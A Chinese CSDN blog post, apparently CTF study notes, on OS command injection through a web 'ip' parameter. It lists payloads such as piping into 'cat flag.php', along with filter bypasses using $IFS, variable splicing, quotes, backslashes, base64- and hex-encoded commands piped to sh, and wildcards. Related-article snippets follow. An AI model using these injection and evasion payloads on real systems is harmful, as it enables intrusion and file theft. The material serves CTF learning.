WEB-命令执行

最新推荐文章于 2024-05-08 20:56:57 发布
最新推荐文章于 2024-05-08 20:56:57 发布
阅读量233 收藏
点赞数
文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yufengly1984/article/details/119214760
版权
本文详细介绍了Linux命令注入的各种方法,包括变量拼接、过滤绕过、内联执行、编码绕过、通配符使用,以及如何通过特殊变量、反斜杠、变量替换和引号等方式防止命令注入。同时,探讨了命令分隔符在执行多条命令中的应用。
摘要由CSDN通过智能技术生成

一、利用 | 连接ls等命令会执行ls查询文件

例如?ip=127.0.0.1|cat flag.php

1、命令行变量拼接

存在过滤的情况就?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php //变量替换

2、过滤bash

也可以echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

先是将cat flag.php转换为Y2F0IGZsYWcucGhw这个base64编码,然后sh执行。

3、内联执行

?ip=127.0.0.1;cat$IFS$1`ls` //内联,就是将反引号内命令的输出作为输入执行这里可以将ls出来的所有文件的内容都cat出来一定要注意反引号!

4、代替空格

$IFS ${IFS} $IFS$1 //$1改成$加其他数字貌似都行 < //cat<a.txt <> {cat,flag.php} //用逗号实现了空格功能 %20 (space) %09 (tab)

5、关键字过滤

方法一:特殊变量

$*
$@
$x    (x 代表 1-9)
${x}   (x>=10)
在没有传参的情况下,上面的特殊变量都是为空的 ca${21}t a.txt

方法二:反斜杠

ca\t a.txt

方法三:变量替换

a=ca;b=t;c=a.txt;aaab $c

方法四:引号

c'a't flag.php

6、编码绕过

Base64 编码绕过

root@kali:~/# echo 'cat a.txt'| base64 Y2F0IGEudHh0Cg==
root@kali:~/# echo 'Y2F0IGEudHh0Cg==' | base64 -d abc

十六进制编码绕过

root@kali:~/# echo 'cat a.txt' | xxd -p 63617420612e7478740a
root@kali:~/# echo '0x63617420612e7478740a'| xxd -r -p Abc

7、通配符

? 
*
[…]:匹配范围中任何一个字符 cat fl[abc]g.php
[a-z]:匹配 a-z 范围中任何一个字符 cat fl[a-z]g.php
{a,b}:对以逗号分割的文件列表进行拓展 cat fl{b,c}g.php

命令分隔与执行多条命令

1.&
& 表示将任务置于后台执行
2.&&
只有在 && 左边的命令返回真(命令返回值 $? == 0),&& 右边的命令才 会被执行。
3.|
| 表示管道,上一条命令的输出,作为下一条命令的参数
4.||
只有在 || 左边的命令返回假(命令返回值 $? == 1),|| 右边的命令才 会被执行。
5.;
多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块

yufengly1984
关注
web前端基本命令_每个Web设计人员都应掌握的基本和基本命令
cune1359的博客
06-27 957
您可能在Web设计和开发教程中遇到过说明,该说明告诉您执行npm install或git clone等操作。这些是命令行界面(CLI)。 我们通常使用终端和命令提示符中的特定命令来告诉计算机执行特定任务 。 终端和命令提示符可能不是最方便使用的工具,特别是对于Web设计人员而言,这是可以理解的,因为Web设计人员可能更熟悉图形界面 。 但是,诸如Yeoman , Bower和Google ...
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 904
ctfshow,命令执行web31
webcmd:一个web版的命令行界面
07-07
网络命令 一个网页版的命令行界面 WebCmd 被定义为单例。 初始化方法: WebCmd.init(options) options 是一个 json 对象,字段如下: title --line title,默认:"cmd"welcomeMsg --text 进入waitingMsg时显示 --waiting 消息,默认:"[请稍候。 .. ]" 路由 --json 对象,包含以下字段: regex: handler: function(cmd, matchArr, thiz) oncancel: function(thiz) 可选 WebCmd.output(str) WebCmd.newLine(title) title {string} : 可选 WebCmd.wait(waitingMsg) waitingMsg {string}:可选,仅适用一次 WebCmd.stopW
WEB命令执行
zip471642048的博客
01-06 1240
web29 简单绕过 web30 绕过禁用的system函数可以用passthru代替 常见执行命令的函数 https://blog.csdn.net/whatday/article/details/106985758 system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() web31 过滤了空格可以用%09代替 空格绕过 ${IFS} 但不能写作 $IFS $IFS$9 %09 <> <
每个Web开发者都该了解的12条命令
06-04 208
转载请注明出处:葡萄城官网,葡萄城为开发者提供专业的开发工具、解决方案和服务,赋能开发者。原文出处:https://tutorialzine.com/2017/08/12-terminal-commands-every-web-developer-should-know 在开发者的弹药箱里,命令行是最具生产力的工具之一。掌握它们可以给你的工作流程带来非常积极的影响...
python web 命令行工具实现
shuifa2008的专栏
08-01 559
有个服务器端命令行工具,想直接放到web执行,比如说mysql命令行,python里有多种实现方式。
WEB安全基础 - - -命令执行漏洞
weixin_67503304的博客
07-28 1713
简要介绍命令执行漏洞的原理,总结了常用的PHP代码执行函数。
ctfshow-命令执行-web37
weixin_43400535的博客
11-03 2886
ctfshow-web37 文章目录ctfshow-web37题目描述:原理:审计:方法:思路:利用文件按包含漏洞,data协议Flag: 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:18:55 # @email: h1xa
python-web-pdb:适用于Python的PDB调试器的基于Web的远程UI
05-14
当前文件框跟踪正在执行的文件中的当前位置。 红线数字表示断点(如果有)。 Globals和Locals框显示当前作用域中的局部和全局变量。 排除以双下划线__开头和结尾的特殊变量(您始终可以使用PDB命令查看它们)。 ...
CTFSHOW WEB入门 命令执行 web29-web36
m0_53194713的博客
06-26 1324
ctfshow web29 web30 web31
Django Ajax 实现Web命令执行
CSDN
11-05 7516
实现Django和Ajax结合的WebSSH(Web-based Secure Shell)应用程序需要一些步骤。WebSSH允许用户通过Web界面访问SSH终端。以下是一些简化的例子,演示如何在Django中使用Ajax轮询实现WebSSH。
web访问命令
weixin_30788731的博客
07-25 639
https://github.com/yudai/gotty go get github.com/yudai/gotty gotty -p 8000 -w kubectl exec -it mysql-5fc8fb5766-vsw9s bash 转载于:https://www.cnblogs.com/mhc-fly/p/9366534.html
内联汇编获取当前执行
Ordinary programmer
12-02 256
//可以死循环,不断+2并输出 int main() { int a = 0; unsigned uesp; DWORD fuc = 0; __asm { mov uesp, esp fldz//retnhere get this address ,next 7 bytes ,before 3 bytes ,all 10 bytes fnstenv[esp - 0x0c] ...
【工具推荐&定制开发】一款轻量的批量web请求命令行工具支持全平台:hey,基本安装、配置、使用
最新发布
代码讲故事
05-08 798
【工具推荐&定制开发】一款轻量的批量web请求命令行工具支持全平台:hey,基本安装、配置、使用。 在开发 Web 应用的过程中,作为开发人员,为了确认接口的性能能够达到要求,我们往往需要一个接口压测工具,帮助我们快速地对我们所提供的 Web 服务发起批量请求。在接口联调的过程中,我们通常会用 Postman 等图形化工具来构造对应的请求并调试接口。但是,如果要做批量的请求,并且希望能展示出对应的统计信息,还是需要通过专门的工具才行。
BUUCTF-内联执行-变量拼接-base绕过-sql改||类型-*.1
m0_64180167的博客
03-30 263
第五周 3.30。
内联函数真的可以提高程序执行效率吗
kslly的专栏
05-05 8248
内联函数是C++开发中常用的一种精湛短小高频率调用的一种方法,本博文使用实例验证了内联函数是否真的可以提高效率,方法引自钱能老师《C++程序设计教程 第二版》
linux 回到进程,linux-Bash:内联执行返回重复的“进程”.为...
weixin_33805938的博客
05-03 201
摘要这将创建一个子外壳,因此两个进程正在运行:line=$(ps aux | grep [m]yscript)这不会创建子外壳.因此,myscript.sh仅运行一个进程:ps aux | grep [m]yscript示范让我们稍微修改一下脚本,以便将流程和子流程PID保存在变量行中:$cat myscript.sh# This is myscript.shline=$(ps aux | gre...
web安全-命令执行
qq_59350385的博客
02-23 3295
一、背景介绍 程序员使用脚本语言开发应用的过程中,脚本语言的开发十分快速,但是也伴随着一些问题。比如速度慢。如果我们开发的应用 ,特别是企业级的一些应用就需要去调用一些外部程序。当web应用需要调用一些外部程序是时就会用到一些执行系统命令的函数。 二、漏洞成因 应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令执行,在没有过滤的情况下就会造成命令执行漏洞。 三、相关函数 system(args)有回显 ...
内联函数与普通函数区别&可执行文件结构介绍
abamon的专栏
09-21 1134
一些基本知识回顾: 1、内联函数与普通函数的区别: 普通函数在编译后会被放到代码段,然后函数执行过程中调用普通函数是需要先压栈,然后根据函数调用地址调用函数,函数返回后执行出栈操作。这样就会存在一个调用过程,有时间消耗(对于频繁调用的子函数就可以考虑写成内联函数的形式)。 而一个内联函数在编译后会将函数代码插入到调用处,这样虽然会增加代码段的空间(内联函数的代码出现在
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值